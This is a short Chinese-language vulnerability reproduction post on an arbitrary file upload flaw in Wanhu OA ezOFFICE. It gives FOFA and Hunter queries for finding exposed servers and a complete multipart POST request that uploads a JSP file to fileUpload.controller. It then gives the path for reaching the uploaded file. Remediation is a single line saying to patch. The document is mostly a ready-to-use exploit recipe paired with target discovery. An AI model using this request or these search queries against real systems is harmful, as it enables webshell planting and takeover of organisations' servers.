万户OA-ezOFFICE fileUpload.controller 任意文件上传漏洞复现

0x01 产品描述：

        万户OA（Office Automation）是一款企业级协同办公管理软件，旨在为企业提供全面的办公自动化解决方案。万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器，导致攻击者可获取服务器控制权限。

0x02 漏洞描述：

        万户OA-ezOFFICE fileUpload.controller中存在一个 任意文件上传漏洞，通过这个漏洞可以操纵任意文件的写入。这意味着不法分子可以利用这个漏洞来上传任意可执行性文件用于远程系统执行、数据获取、系统接管等，严重威胁系统的安全性

0x03 搜索语句：

Fofa：app="万户ezOFFICE协同管理平台" || app="万户网络-ezOFFICE"

Hunter: app.name="万户 Ezoffice OA"

0x04 漏洞复现：

POST /defaultroot/upload/fileUpload.controller HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Length: 773--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary12345
--KPmtcldVGtT3s8kux_aHDDZ4-A7wRsken5v0--

 上传成功后拼接下列接口进行访问 

http://your-ip:port/defaultroot/upload/html/2024xxxxxxxxxxxxxx.jsp

0x05 修复建议：

厂商已发布补丁，请及时修复